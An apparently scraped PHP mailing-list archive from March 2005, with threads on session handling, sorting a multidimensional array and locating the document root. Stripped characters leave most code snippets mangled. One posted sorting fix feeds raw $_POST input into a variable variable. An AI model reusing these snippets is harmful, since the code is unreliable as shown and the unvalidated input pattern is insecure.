Mirco Blitz
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] PHP Sessions?
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 2:38 PM said:
Is it to do with the link:
a href=\index.php?action=edit\
does this call the script again, just as an action=script.php in a
form would? Cheers for the help on this.
Yes it does. But it doesn't erase the session values (it seems that's
what you think is happening?).
I think what you need to do (I do this sometimes too) is start from
scratch and create a very basic test page that works as expected. Then
slowly add in the features you want. It'll give you a much greater
understanding of how things work and where you're going wrong. Sure it's
tedious but it'll help you in the long run.
Here is a good base to start with:
?php
session_start();
if(isset($_GET['var']) !empty($_GET['var']))
{
$_SESSION['myVariable'] = from form;
}
else
{
$_SESSION['myVariable'] = direct request;
}
print_r($_SESSION);
?
hth,
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
AW: [PHP] How to sort a Multidimensional array?
Hi,
Thank you, for the Hint.
I just have looked in German Doc and that is incomplete.
Here is my solution.
If someone has the same problem.
foreach($arr as $key=$values){
foreach($values as $valkey=$value){
$$valkey[$key]=$value;
}
}
array_multisort($$_POST[sortby], $_POST[asc_desc], $arr);
Greetings
Mirco Blitz
-Ursprüngliche Nachricht-
Von: Frank Arensmeier [mailto:[EMAIL PROTECTED]
Gesendet: Mittwoch, 2. März 2005 23:59
An: Mirco Blitz
Cc: php general list
Betreff: Re: [PHP] How to sort a Multidimensional array?
Hello!
This must be one of the most frequently asked questions ever. Anyway, take a
look at the PHP manual. Look for a function called 'foreach'. To put it
simple, with 'foreach' you are able to go through the array step-by-step,
value by value.
For example:
?php
$arr = array('value1', 'value2', 'value3); foreach ($arr as $key = $value)
{
echo Key: $key; Value: $valuebr /\n; // in stead of just echoing the
values and keys, you can e.g. assign the values to another array and sort
them when done } ?
regards,
frank
2005-03-02 kl. 23.27 skrev Mirco Blitz:
Hi,
i have a multidimensional array that look like this:
$arr=array($key=array('item0key'='item0', 'item1key'='item1',
'item2key'='item2', 'item3key'='item3', 'item4key'='item4'));
Lineview:
0item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
1item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
2item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
4item0key = item0
item1key = item1
item2key = item2
item3key = item3
item4key = item4
How can I sort such an array, depending on the Userentry by the Item
values?
Thank you very much
Mirco Blitz
--
PHP General Mailing List (http://www.php.net/) To unsubscribe, visit:
http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Document root, preferred way to find it???
Hello Al, Wednesday, March 2, 2005, 12:21:58 PM, you wrote: A What do you guys use for you docroot? I ran into the same problem and also asked here for any ideas. I finally ended up writing my own function to do it. You can find the tutorial here: http://www.devtek.org/tutorials/dynamic_document_root.php I'm still looking for a better way, cause this is kludgy. -- Leif (TB lists moderator and fellow end user). Using The Bat! 3.0.2.3 Rush under Windows XP 5.1 Build 2600 Service Pack 2 on a Pentium 4 2GHz with 512MB -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] PHP Sessions?
Yeah your right, I'm trying to walk before I can crawl! Cheers for the help,
Rory.
Chris W. Parker wrote:
rory walsh mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 2:08 PM said:
Thanks everyone, I'm getting closer. The only problem I have not is
that I keep entering that test, I modified it to change the session
variable once we enter the test but it somehow does not seem to
change it? This is the code,
Immediately I see:
if(strlen($_SESSION['loggedin']==yes)){
That doesn't make sense. Do you mean?:
if($_SESSION['loggedin'] == yes) {
And the next line:
$_SESSION['loggedin']=no;
Why are you reversing the value of 'loggedin'? Once the person is logged
in shouldn't they stay that way until session timeout or they log out?
When I click the logout button it works fine, but when I click on the
link inside the page it simply reloads the same page as if the session
variable has not changed at all? If I link to a page like this does it
call the script again, or does this need to be done with a form
submit? I must apologise for my lack of knowledge here! I program in
other languages and as a result I have that I can get really deep in
code I don't understand very fast!
Maybe you've already stated this in a previous email and I just don't
remember, what exactly is it that you're trying to accomplish?
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
